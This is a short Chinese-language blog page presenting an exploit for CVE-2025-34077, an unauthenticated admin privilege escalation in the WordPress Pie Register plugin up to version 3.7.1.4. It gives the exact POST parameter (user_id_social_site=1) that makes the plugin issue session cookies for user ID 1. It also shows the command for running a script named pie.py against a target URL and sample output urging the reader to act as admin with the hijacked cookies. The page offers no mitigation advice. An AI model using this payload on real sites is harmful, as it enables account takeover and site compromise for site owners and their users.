WordPress Pie Register插件未授权管理员权限提升漏洞利用分析

本文详细分析了CVE-2025-34077漏洞,该漏洞影响WordPress Pie Register插件≤3.7.1.4版本,攻击者可通过未授权端点劫持管理员会话,获取用户ID为1的管理员cookie,实现权限提升。

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - 管理员权限提升(未授权)

漏洞状态 CVE标识 Python

💀 作者

Mrj Haxcore

🧠 漏洞概要

WordPress的Pie Register插件(版本≤3.7.1.4)暴露了一个未授权端点,攻击者只需POST特定payload即可劫持管理员会话

利用该漏洞可窃取用户ID为1的会话cookie(通常是admin),无需任何登录凭证。


📦 受影响软件


📬 漏洞参数:

user_id_social_site=1 当向根URL(/)POST此参数时,插件会将攻击者认证为用户ID为1的用户(通常是admin),并颁发有效的会话cookie。


🔧 要求

  • Python 3.x
  • requestsbeautifulsoup4(可选,用于cookie解析)

▶️ 运行漏洞利用

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
python3 pie.py http://target.site

---
输出
[*] 发送payload劫持管理员会话...

[+] 成功劫持用户ID=1(管理员)的cookie:
    wordpress_sec_xxxxxx = <cookie值>
    wordpress_logged_in_xxxxxx = <cookie值>

[!] 在浏览器或curl、Burp等工具中使用这些cookie以管理员身份操作。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计